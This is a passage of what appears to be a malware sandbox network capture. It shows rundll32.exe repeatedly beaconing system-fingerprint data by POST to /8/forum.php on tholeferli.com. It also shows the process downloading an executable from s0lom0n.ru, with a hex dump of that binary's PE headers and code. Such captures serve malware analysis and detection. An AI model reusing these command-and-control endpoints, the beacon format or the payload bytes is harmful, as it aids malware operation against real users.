                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:41.995012045 CEST512INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:41 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4a 59 42 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cJYBQARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                194192.168.2.2249361194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:42.266980886 CEST513OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:42.422451019 CEST513INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:42 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 54 48 53 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cTHSGARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                195192.168.2.2249362194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:42.708059072 CEST514OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:42.866810083 CEST514INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:42 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 51 59 42 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cQYBJARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                196192.168.2.2249363194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:43.142509937 CEST515OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:43.311347008 CEST515INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:43 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 51 48 53 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cQHSJARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                197192.168.2.2249364194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:43.592484951 CEST516OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:43.759109974 CEST516INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:43 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 43 42 59 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cCBYXARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                198192.168.2.2249365194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:44.030925989 CEST517OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:44.500493050 CEST518INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:44 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 43 42 59 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cCBYXARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                199192.168.2.2249366194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:44.782286882 CEST518OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:45.254894972 CEST519INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:45 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 51 4d 4e 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cQMNJARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                2192.168.2.22491698.211.241.080C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:04.434003115 CEST2OUTGET /7hsjfd9w4refsd.exe HTTP/1.1
                                                Accept: */*
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: s0lom0n.ru
                                                Cache-Control: no-cache
                                                Jul 22, 2021 16:11:04.616672993 CEST4INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 22 Jul 2021 14:11:04 GMT
                                                Content-Type: application/octet-stream
                                                Content-Length: 272910
                                                Connection: keep-alive
                                                Last-Modified: Wed, 09 Jun 2021 16:00:40 GMT
                                                ETag: "60c0e5a8-42a0e"
                                                Accept-Ranges: bytes
                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 00 00 00 00 00 2a 04 00 00 00 00 00 e0 00 2f 03 0b 01 02 1e 00 50 03 00 00 26 04 00 00 06 00 00 80 14 00 00 00 10 00 00 00 60 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 80 04 00 00 04 00 00 81 81 04 00 02 00 00 01 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 04 00 a4 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 9b 03 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 52 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 4f 03 00 00 10 00 00 00 50 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 38 00 00 00 00 60 03 00 00 02 00 00 00 54 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 a8 2d 00 00 00 70 03 00 00 2e 00 00 00 56 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2f 34 00 00 00 00 00 00 14 90 00 00 00 a0 03 00 00 92 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 40 04 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 69 64 61 74 61 00 00 a4 0e 00 00 00 50 04 00 00 10 00 00 00 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 38 00 00 00 00 60 04 00 00 02 00 00 00 26 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 70 04 00 00 02 00 00 00 28 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f3 c3 8d b4 26 00 00 00 00 8d bc 27 00 00 00 00 83 ec 1c 31 c0 66 81 3d 00 00 40 00 4d 5a c7 05 ec 43 44 00 01 00 00 00 c7 05 e8 43 44 00 01 00 00 00 c7 05 e4 43 44 00 01 00 00 00 c7 05 80
                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL*/P&`@ PdR.textDOP`P`.data8`T@@.rdata-p.V@@@/4@0@.bss@@`.idataP@0.CRT8`&@0.tlsp(@0&'1f=@MZCDCDCD
                                                Jul 22, 2021 16:11:04.616720915 CEST5INData Raw: 40 44 00 01 00 00 00 74 49 a3 08 40 44 00 a1 f8 43 44 00 85 c0 74 2d c7 04 24 02 00 00 00 e8 b2 3d 03 00 e8 b5 3d 03 00 8b 15 08 44 44 00 89 10 e8 ac 3e 03 00 83 3d 20 60 43 00 01 74 63 31 c0 83 c4 1c c3 c7 04 24 01 00 00 00 e8 85 3d 03 00 eb d1
                                                Data Ascii: @DtI@DCDt-$==DD>= `Ctc1$=<@@PE@uQft>fuv1rv'$QC@1ytL1:f,CDD$@DD$@DD$@D
                                                Jul 22, 2021 16:11:04.616750002 CEST7INData Raw: 10 00 8d 77 14 8b 47 08 3b 47 0c 74 72 8d 48 18 8d 55 d8 89 4f 08 8d 4d ac f2 0f 10 40 10 f2 0f 11 45 e8 f2 0f 10 00 f2 0f 10 48 08 f2 0f 11 4d e0 f2 0f 11 45 d8 e8 8b 2e 00 00 89 d9 e8 e2 1b 00 00 c7 47 10 01 00 00 00 f2 0f 10 45 e8 f2 0f 11 46
                                                Data Ascii: wG;GtrHUOM@EHME.GEFEMNEtMEM]4g],uKuW0&.t8MEMMMEEMECKCO,>g,#H^_[
                                                Jul 22, 2021 16:11:04.616771936 CEST8INData Raw: d9 89 45 d0 f2 0f 11 45 c8 e8 b4 4e 02 00 89 d6 8d 4d ac 89 c2 56 e8 41 b7 00 00 58 89 d9 e8 dd 0f 02 00 8b 45 c4 f2 0f 10 45 bc f2 0f 10 55 ac f2 0f 10 4d b4 8d 4d 94 89 da 89 45 e0 f2 0f 11 45 d8 f2 0f 11 4d d0 f2 0f 11 55 c8 e8 99 2b 00 00 8b
                                                Data Ascii: EENMVAXEEUMMEEMU+EpUuJJMEMEMUFNVeME `^_[]USWV,rMBJ)EMtFKBAr[rIs
                                                Jul 22, 2021 16:11:04.616791964 CEST9INData Raw: 1c 8b 5a 04 89 c6 0f b7 78 06 85 db 74 0a 8b 76 34 8b 44 b8 34 4b eb ee 8b 52 08 eb 06 31 c0 31 f6 31 d2 83 21 00 89 71 04 83 61 08 00 83 61 0c 00 83 61 10 00 89 41 14 83 61 18 00 89 79 1c 89 51 20 5e 5f 5b 5d c3 55 89 e5 53 57 56 83 ec 20 8b 45
                                                Data Ascii: Zxtv4D4KR111!qaaaAayQ ^_[]USWV EuMWPf%XYFN>^EMv9jXP7YUjXP7YjX9EuOM0}t2u6jZW|%Y9u WuP-MUc0
                                                Jul 22, 2021 16:11:04.616808891 CEST11INData Raw: 74 00 00 eb 1a b8 5c 6e 00 00 eb 13 b8 5c 72 00 00 eb 0c b8 5c 22 00 00 eb 05 b8 5c 27 00 00 89 f9 c7 45 d4 01 00 00 00 83 65 d8 00 89 4d dc 89 45 e0 e9 50 ff ff ff 89 c1 80 c1 e0 80 f9 5f 73 05 31 c9 41 eb db 89 c2 c0 ea 04 3c a0 6a 57 59 6a 30
                                                Data Ascii: t\n\r\"\'EeMEP_s1A<jWYj0_B$<jWZBj_\xjY/ECEeECeEKSPtY(^_[]UEMj'Y]UEMjY]UEu0
                                                Jul 22, 2021 16:11:04.616833925 CEST12INData Raw: 00 83 c4 24 5e 5f 5d c3 e8 95 1b 02 00 0f 0b 55 89 e5 57 56 83 ec 24 89 ce 31 c9 8d 45 f4 8d 7d ec 89 10 41 8d 55 d4 89 07 c7 47 04 13 28 40 00 89 0e 83 66 04 00 c7 02 c8 94 43 00 89 4a 04 83 62 08 00 83 66 08 00 89 7a 10 89 4a 14 89 f1 e8 bb fb
                                                Data Ascii: $^_]UWV$1E}AUG(@fCJbfzJu$^_]7UWV$1E}AUG&@fCJbfzJ]u5$^_]UWV$1E}AUG_&@f
                                                Jul 22, 2021 16:11:04.616856098 CEST13INData Raw: 75 1c ff 75 18 ff 75 14 e8 4f 05 01 00 83 c4 10 89 f0 5e 5d c3 55 89 e5 56 8b 75 08 8b 45 0c 8b 55 10 89 f1 ff 30 ff 75 1c ff 75 18 ff 75 14 e8 28 05 01 00 83 c4 10 89 f0 5e 5d c3 55 89 e5 56 8b 75 08 8b 45 0c 8b 55 10 89 f1 ff 30 ff 75 1c ff 75
                                                Data Ascii: uuuO^]UVuEU0uuu(^]UVuEU0uuu^]UVuEU0uuu^]UVuEU0uuu^]UVuEU0uuu^]UVV^]U
                                                Jul 22, 2021 16:11:04.616877079 CEST15INData Raw: 30 37 00 00 58 5d c3 55 89 e5 53 57 56 83 ec 40 85 c9 74 36 8b 45 08 89 ce 0f b7 79 06 85 d2 74 0a 8b 76 34 8b 4c b9 34 4a eb ee 83 65 b4 00 89 75 b8 83 65 bc 00 83 65 c0 00 83 65 c4 00 89 4d c8 83 65 cc 00 89 7d d0 eb 0a 83 65 b8 00 83 65 c8 00
                                                Data Ascii: 07X]USWV@t6Eytv4L4JeueeeMe}ee1MA trHEE]EKCsy9r"UMMUEY&UMEuFtL4Jt41#KCsEEt-MUu}MEU%
                                                Jul 22, 2021 16:11:04.616899014 CEST16INData Raw: 38 89 44 24 3c 89 54 24 40 89 f1 89 fa e8 4b 21 00 00 8b 44 24 1c 85 c0 74 0a 8b 4c 24 18 8b 54 24 20 eb d9 8d 65 f4 5e 5f 5b 5d c3 0f 0b 0f 0b 55 89 e5 8b 01 66 83 20 00 8b 51 04 8b 01 01 d2 89 c1 6a 02 e8 b1 31 00 00 58 5d c3 55 89 e5 8b 41 04
                                                Data Ascii: 8D$<T$@K!D$tL$T$ e^_[]Uf Qj1X]UAtkj1X]UV~t+^]JVX^]UWV9t)IF)j4_(VMQ^_]U9t]]UWV9t)
                                                Jul 22, 2021 16:11:04.671677113 CEST18INData Raw: 36 e8 34 f1 01 00 58 59 0f 0b 55 89 e5 56 8b 31 89 d0 8b 51 04 89 f1 50 6a 00 e8 1b f1 01 00 58 59 0f 0b 55 89 e5 57 56 8b 11 8b 79 08 8b 71 04 8b 02 8b 52 04 89 c1 ff 37 ff 36 e8 fa f0 01 00 58 59 0f 0b 55 89 e5 ff 75 0c ff 75 08 e8 81 ee ff ff
                                                Data Ascii: 64XYUV1QPjXYUWVyqR76XYUuuYZ]UuuYZ4]UVUMut9tv<~^]MnUMUEUMt9tv<~)]MEUEAQ<USWV,


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                20192.168.2.2249187194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:12.384293079 CEST317OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:12.542473078 CEST318INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:12 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4e 54 47 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cNTGMARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                200192.168.2.2249367194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:45.595802069 CEST519OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:45.752193928 CEST520INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:45 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4e 41 5a 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cNAZMARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                201192.168.2.2249368194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:46.029088974 CEST521OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:46.481442928 CEST521INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:46 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4e 59 42 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cNYBMARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                202192.168.2.2249369194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:46.760914087 CEST522OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:46.929050922 CEST522INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:46 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 43 41 5a 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
